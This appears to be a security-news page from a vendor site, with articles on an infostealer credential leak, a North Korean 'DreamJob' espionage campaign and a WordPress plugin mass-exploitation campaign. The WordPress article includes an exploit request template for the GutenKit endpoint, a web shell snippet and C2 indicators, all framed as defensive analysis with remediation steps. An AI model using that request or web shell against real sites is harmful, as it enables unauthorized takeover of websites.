company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO

Application Security Engineer

DevsecOps Engineer

IT Manager

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Discord

RedTiger

loading..
loading..
loading..

RedTiger's 400-Process Attack Cripples Discord Gamers

RedTiger malware has compromised over 408,000 gamers by weaponizing Discord. Discover how this stealer hijacks tokens, payment data, and accounts

27-Oct-2025
6 min read

No content available.

Related Articles

loading..

Infostealer

Clickbait

A massive leak of 183 million email credentials is causing panic online, but Goo...

A stunning collection of 183 million usernames and passwords has just been released to the public, sending shockwaves through the online security community. The data, loaded into the popular breach-checking service _"Have I Been Pwned,"_ is being dubbed the _"Synthient Stealer Log Threat Data"_. Headlines are screaming that [Gmail](https://www.secureblink.com/cyber-security-news/apt28-targets-14000-gmail-users-in-a-phishing-campaign-linked-to-russia-google-notifies) has been breached, but Google is pushing back hard. In a series of public statements, the tech giant labeled these reports "entirely false," asserting that "Gmail's defenses are strong, and users remain protected". So, what is really going on? The terrifying reality is that this isn't a story about hackers breaking into Google's servers. It's a story about hackers breaking into *your* computer. #### **Source of the Leak-Info-Stealing Malware** The 183 million credentials were not stolen in a single attack on a company. Instead, they were siphoned directly from victims' computers over many years using information-stealing malware, or "infostealers". This type of malware is particularly dangerous. When it infects a device, it secretly records everything you type, capturing: * **Website addresses** (e.g., accounts.google.com) * **Email addresses** * **Passwords** This means the data is a chaotic mix of login information for thousands of different websites, from social media to banking sites, all stolen from individual users. Of the 183 million unique email addresses, a shocking _**16.4 million had never been seen before in any previous data breach**_, making this a fresh and serious threat for millions of people. #### **Google's Systems Were Not HACKED** The confusion arose because the aggregated data contains a vast number of Gmail login credentials. However, Google clarifies that this does not mean its systems were compromised. "The inaccurate reports are stemming from a misunderstanding of infostealer databases, which routinely compile various credential theft activity occurring across the web," the company stated. "It's not reflective of a new attack aimed at any one person, tool, or platform". In essence, the leak is a compilation of credentials stolen from the *user's end*, not from Google's servers. This is a critical distinction that much of the early media coverage got wrong. The table below clarifies the core misunderstanding: | **Aspect of Confusion** | **What Was Falsely Reported** | **What Actually Happened** | | :--- | :--- | :--- | | **Nature of Incident** | A new security breach of Google's systems | An aggregation of old, stolen data from malware and past breaches | | **Source of Data** | A direct hack on Gmail | Info-stealing malware on users' devices and credential stuffing lists | | **Google's Stance** | Google warned all users of a breach | Google disputes the reports, stating Gmail's defenses were not compromised | #### **How to Protect Yourself NOW** Even though Google itself wasn't hacked, your personal data is at high risk if it appears in this leak. Threat actors use these exact credentials to breach corporate networks, carry out ransomware attacks, and hijack online accounts. Here are the essential steps you must take right now: 1. **Check Your Exposure**: Immediately visit **Have I Been Pwned (HIBP)** at [https://haveibeenpwned.com/](https://haveibeenpwned.com/). You can check if your email appears in the "Synthient Stealer Log Threat Data" or other breaches. 2. **Change Affected Passwords**: If you are flagged, change the password for that email account and **any other account where you used the same password** immediately. 3. **Enable 2-Step Verification (2FA)**: Add an extra layer of security to your important accounts. Google strongly recommends using **passkeys** as a safer, passwordless alternative. 4. **Run an Antivirus Scan**: Since this data originated from info-stealing malware, use a reputable antivirus program to scan your computer for infections. 5. **Use a Password Manager**: Create and store strong, unique passwords for every site to prevent a breach on one service from compromising others. While the sensational claims of a direct Gmail breach were false, the danger posed by these 183 million exposed credentials is very real. Taking action today is your best defense against the hidden malware and criminal networks trading your private information.

loading..   27-Oct-2025
loading..   4 min read
loading..

WordPress

Critical analysis of a mass WordPress plugin exploit. Attackers use auth bypass ...

A coordinated mass exploitation campaign is actively targeting critical privilege escalation vulnerabilities in the GutenKit and Hunk Companion WordPress plugins. This campaign leverages authentication bypass flaws to achieve unauthenticated remote code execution through arbitrary plugin installation. The ongoing attacks represent a systemic threat to WordPress security, with threat actors establishing persistent backdoors and maintaining redundant access mechanisms across compromised infrastructures. ## **Vulnerability Analysis** ### **WordPress REST API Authorization** WordPress provides a REST API infrastructure that allows plugins to register custom endpoints. Proper security implementation requires two distinct validation layers: - **Authentication**: Verifying user identity - **Authorization**: Validating user capabilities via `current_user_can()` checks - **Nonce Verification**: CSRF protection through single-use tokens The vulnerabilities arise from conflating nonce verification with proper authorization, creating a fundamental design flaw in the affected plugins' security model. ### **CVE-2024-9234: GutenKit Plugin Analysis** **Affected Component**: `/wp-json/gutenkit/v1/install-active-plugin` **Vulnerable Code Pattern**: ```php function gutenkit_install_active_plugin() { // Security check relying solely on nonce verification check_ajax_referer('gutenkit_ajax_nonce', 'nonce'); // No capability check before privileged operation $plugin_slug = $_POST['slug']; $result = $this->install_plugin($plugin_slug); // ... installation and activation logic } ``` **Root Cause**: The endpoint performed nonce verification via `check_ajax_referer()` but completely omitted the required capability check (`current_user_can('install_plugins')`). Nonces in WordPress are designed exclusively for CSRF protection and can be harvested or predicted, making them insufficient for authorization enforcement. **Impact**: Any unauthenticated attacker with knowledge of a valid nonce or the ability to bypass nonce verification could trigger plugin installation and activation procedures. ### **CVE-2024-9707 & CVE-2024-11972: Hunk Companion Analysis** **Affected Component**: `/wp-json/hc/v1/themehunk-import` **Vulnerability Evolution**: **Initial Flaw (CVE-2024-9707)**: The plugin's demo import functionality contained identical authorization deficiencies, allowing unauthenticated plugin installation through insufficient nonce checks. **Incomplete Patch (Version 1.8.5)**: The initial fix attempted to address the vulnerability but contained logical flaws that allowed bypass techniques, leading to CVE-2024-11972. **Final Resolution (Version 1.9.0)**: The comprehensive patch implemented proper capability checks: ```php function themehunk_import_install_plugin() { // Proper authorization check added if (!current_user_can('install_plugins')) { return new WP_Error('unauthorized', 'Insufficient permissions'); } // Nonce verification for CSRF protection if (!wp_verify_nonce($_POST['nonce'], 'hc_ajax_nonce')) { return new WP_Error('invalid_nonce', 'Security check failed'); } // Proceed with plugin installation // ... secure implementation } ``` ## **Exploitation Methodology & Attack Chain** ### **Reconnaissance Phase** Threat actors employ large-scale scanning methodologies to identify vulnerable installations: - **User-Agent Analysis**: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36` (common in observed attacks) - **Endpoint Probing**: Sequential requests to `/wp-json/gutenkit/v1/install-active-plugin` and `/wp-json/hc/v1/themehunk-import` - **Version Fingerprinting**: Analysis of plugin header metadata to identify vulnerable versions ### **Initial Compromise Vector** **HTTP Request Template for GutenKit Exploitation**: ```http POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1 Host: TARGET_HOST Content-Type: application/x-www-form-urlencoded Content-Length: 132 Connection: close action=install-plugin&slug=wp-query-console&nonce=EXTRACTED_NONCE ``` **Attack Workflow**: 1. **Nonce Harvesting**: Extract valid nonces from public page sources or through API leakage 2. **Plugin Installation**: Utilize vulnerable endpoint to install known vulnerable or malicious plugins 3. **Activation Bypass**: The same vulnerable function typically handles both installation and activation ### **Persistence Mechanism Implementation** The primary persistence mechanism involves deploying a custom malicious plugin, typically distributed as `up.zip`, which contains sophisticated obfuscation: **Malicious Plugin Architecture**: ``` /wp-content/plugins/up/ ├── up.php (Main loader with heavily obfuscated code) ├── includes/ │ └── core.php (Web shell functionality) └── vendor/ └── autoload.php (Dependency loader) ``` **Obfuscation Techniques Observed**: - Multiple layers of base64 encoding with gzcompress - Dynamic variable name generation - String fragmentation and concatenation - Conditional execution based on HTTP headers **Web Shell Capabilities**: ```php // Simplified representation of backdoor functionality if (isset($_REQUEST['cmd']) && md5($_REQUEST['key']) === $secret_hash) { system(base64_decode($_REQUEST['cmd'])); } if (isset($_FILES['backdoor'])) { move_uploaded_file($_FILES['backdoor']['tmp_name'], $_FILES['backdoor']['name']); } ``` ### **Redundancy & Lateral Movement** **Secondary Payload Deployment**: Attackers consistently install the known vulnerable `wp-query-console` plugin as a fallback RCE mechanism. This plugin contains unauthenticated SQLi-to-RCE vulnerabilities that provide guaranteed access even if primary backdoors are discovered. **Lateral Movement Patterns**: 1. Database credential extraction from `wp-config.php` 2. Cross-site contamination through shared hosting environments 3. WordPress multisite exploitation where applicable ## **Forensic Indicators of Compromise** ### **Filesystem Artifacts** **Primary Malicious Components**: - `/wp-content/plugins/up/up.php` (Main backdoor loader) - `/wp-content/plugins/background-image-cropper/` (Alternative payload) - `/wp-content/plugins/ultra-seo-processor-wp/` (SEO spam injection tool) **Secondary Implants**: - `/wp-content/plugins/wp-query-console/` (RCE fallback) - `/wp-content/uploads/cache/.htaccess` (Web shell hidden in uploads) - `/wp-includes/fonts/tmp.txt` (Temporary command storage) ### **Network Indicators** **HTTP Request Patterns**: ```log # Initial exploitation "POST /wp-json/gutenkit/v1/install-active-plugin" 200 "POST /wp-json/hc/v1/themehunk-import" 200 # Backdoor communication "GET /wp-content/plugins/up/up.php?cmd=Y21kLmV4ZQ==" 200 "POST /wp-content/plugins/wp-query-console/includes/query-console.php" 200 ``` **Command and Control Signatures**: - Beaconing to IP ranges: `45.95.147.*` and `185.162.235.*` - DNS queries for `*.dynamic-dns.net` domains - HTTP User-Agents containing `php/8.1.0` or `cli` in legitimate web traffic ### **Database and Log Evidence** **Database Modifications**: - New entries in `wp_options` table under `active_plugins` serialized data - Unknown administrative users in `wp_users` with `user_level` = 10 - Modified `wp_posts` content with injected malicious scripts **Error Log Patterns**: - `PHP Warning: Cannot modify header information` following exploitation attempts - `PHP Notice: Undefined index` in compromised plugin files - Database errors from malformed SQL queries in `wp-query-console` activity ## **Comprehensive Mitigation Framework** ### **Immediate Response Actions** **Containment Procedures**: 1. **Network Isolation**: Block inbound traffic to `/wp-json/gutenkit/*` and `/wp-json/hc/*` at WAF/network layer 2. **File Integrity Monitoring**: Deploy real-time monitoring on `/wp-content/plugins/` directory 3. **Database Lockdown**: Revoke `INSERT/DROP` privileges for WordPress database user temporarily **Forensic Data Collection**: ```bash # Collect exploitation artifacts grep -r "gutenkit\|themehunk-import" /var/log/apache2/ find /wp-content/plugins/ -name "*.php" -mtime -7 -exec ls -la {} \; mysql -e "SELECT * FROM wp_options WHERE option_name='active_plugins'" ``` ### **Vulnerability Remediation** **Patch Verification**: - Confirm GutenKit version ≥ 2.1.1 through file checksum validation - Verify Hunk Companion version ≥ 1.9.0 with capability checks present - Validate proper authorization in patched endpoints: ```php // Verification method for proper patching function verify_authorization_fix($plugin_file) { $content = file_get_contents($plugin_file); return (strpos($content, "current_user_can('install_plugins')") !== false); } ``` ### **Compromise Recovery Protocol** **Systematic Cleanup Process**: 1. **Malicious Code Eradication**: - Remove all identified IoC files and directories - Scan for base64-encoded blocks and obfuscated PHP in all theme/plugin files - Validate core WordPress files against known good checksums 2. **Database Sanitization**: ```sql -- Remove unauthorized admin users DELETE FROM wp_users WHERE user_login IN ('admin1', 'setupuser', 'tempadmin'); -- Clean compromised options UPDATE wp_options SET option_value = 'clean_value' WHERE option_name = 'active_plugins' AND option_value LIKE '%malicious-plugin%'; ``` 3. **Credential Rotation**: - WordPress security keys in `wp-config.php` - Database user passwords - SFTP/SSH credentials - Administrative user passwords ### **Post-Incident Hardening** **Security Control Enhancement**: - Implement application-level firewall rules blocking unauthenticated REST API requests to plugin endpoints - Deploy file integrity monitoring with real-time alerting - Establish regular security patch management workflow with verification steps **Continuous Monitoring**: - Web application firewall logging with automated IoC matching - File change detection in wp-content directory - Database query monitoring for suspicious activity patterns ## **Strategic Recommendations** ### **Development Best Practices** **WordPress Plugin Security Standards**: - Always implement proper capability checks alongside nonce verification - Follow the principle of least privilege for all administrative functions - Conduct security code reviews focusing on authorization logic - Implement comprehensive input validation and output escaping ### **Organizational Security Policy** - Establish mandatory security patching SLAs (critical patches within 24 hours) - Implement automated vulnerability scanning for WordPress environments - Conduct regular security awareness training covering WordPress-specific threats - Develop and test incident response procedures for web application compromises

loading..   25-Oct-2025
loading..   7 min read
loading..

Lazarus

How Lazarus Group lured European defense engineers with fake job offers, hijacke...

**In a stunning revelation that blurs the line between cybercrime and international espionage, security researchers have uncovered a sprawling North Korean hacking campaign targeting the heart of Europe's defense industry. The mission: steal critical drone technology by offering engineers the one thing they couldn't resist—a perfect career opportunity.** #### **A Tailored Offer You Can't Refuse** The operation, dubbed "Operation DreamJob" by analysts at ESET who discovered it, relied not on a complex digital break-in, but on a timeless con: social engineering. Attackers from the infamous Lazarus Group meticulously posed as recruiters from legitimate, well-known aerospace and defense companies. They sent highly targeted spear-phishing emails to key engineers and technical staff, containing compelling job descriptions. The catch was a malicious file, often disguised as a necessary "PDF reader" or document viewer required to see the full offer. With a single click from an unsuspecting target, the digital heist began. #### **A Ghost in the Machine** Once executed, the attack unfolded with chilling precision. The initial file employed a sophisticated technique known as "DLL side-loading," which essentially tricks a trusted, legitimate application into secretly loading malicious code. This allows the hackers to bypass standard security defenses completely undetected. In a brazen move to appear legitimate, the hackers weaponized trust itself. They hijacked popular open-source software like Notepad++ and WinMerge, embedding their malicious payloads into these benign, everyday tools. They then distributed these trojanized versions through platforms like GitHub, creating a perfect illusion of authenticity for anyone who downloaded them. #### **Silent Theft for Military Gains** The ultimate goal of this multi-stage infiltration was to deploy a powerful, custom-built Remote Access Trojan (RAT) known as "ScoringMathTea." This sophisticated malware provides the attackers with complete, remote control over the compromised computer. From there, Lazarus operatives could move silently through corporate networks for months, identifying and exfiltrating priceless intellectual property: design schematics, proprietary manufacturing processes, and technical know-how directly related to unmanned aerial vehicle (UAV) technology. The intelligence gain for North Korea's military drone program is immeasurable, allowing them to leapfrog years of costly and complex research and development. #### **A New Era of Industrial Espionage** Operation DreamJob is more than a cyberattack; it's a clear signal of how state-sponsored espionage has evolved. By targeting the foundational knowledge of military technology, North Korea is directly augmenting its military capabilities through theft. The campaign serves as a critical warning for defense contractors and technology firms worldwide: the human firewall is the first and most important line of defense. Vigilance against sophisticated social engineering, rigorous verification of software sources, and advanced threat-hunting for these specific stealth techniques are no longer optional—they are essential to safeguarding national security in the digital age.

loading..   24-Oct-2025
loading..   3 min read
Company Logo
logo

Secure Blink automates the web application and API security for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

LinkedIn Logo
Twitter Logo
Discord Logo
Telegram Logo
YouTube Logo

[email protected]

@ Copyright 2025 Secure Blink. All rights reserved.